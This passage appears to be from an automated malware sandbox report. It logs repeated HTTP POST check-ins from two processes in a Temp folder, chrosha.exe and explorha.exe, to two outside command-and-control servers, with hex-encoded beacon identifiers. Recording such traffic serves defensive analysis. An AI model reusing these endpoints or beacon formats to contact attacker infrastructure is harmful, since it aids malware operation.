                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1151 | 192.168.2.5 | 51005 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:15.931210041 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:16.179217100 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1152 | 192.168.2.5 | 51006 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:16.431946039 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:16.685324907 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1153 | 192.168.2.5 | 51007 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:16.496136904 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:16.743957996 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1154 | 192.168.2.5 | 51008 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:16.990781069 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:17.236195087 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1155 | 192.168.2.5 | 51009 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:17.037487984 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:17.281054974 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1156 | 192.168.2.5 | 51010 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:17.535883904 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:17.788589954 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1157 | 192.168.2.5 | 51011 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:17.589005947 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:17.833724022 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1158 | 192.168.2.5 | 51012 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:18.087223053 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:18.341687918 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1159 | 192.168.2.5 | 51013 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:18.154568911 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:18.405741930 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1160 | 192.168.2.5 | 51014 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:18.657481909 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:18.910665989 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1161 | 192.168.2.5 | 51015 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:18.696407080 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:18.943959951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1162 | 192.168.2.5 | 51016 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:19.196639061 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:19.448587894 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1163 | 192.168.2.5 | 51017 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:19.275003910 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:19.520519972 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1164 | 192.168.2.5 | 51018 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:19.769016981 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:20.018354893 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1165 | 192.168.2.5 | 51019 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:19.811000109 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:20.055469036 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1166 | 192.168.2.5 | 51020 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:20.311156988 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:20.566304922 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1167 | 192.168.2.5 | 51021 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:20.380181074 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:20.624376059 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1168 | 192.168.2.5 | 51022 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:20.878110886 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:21.132797956 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
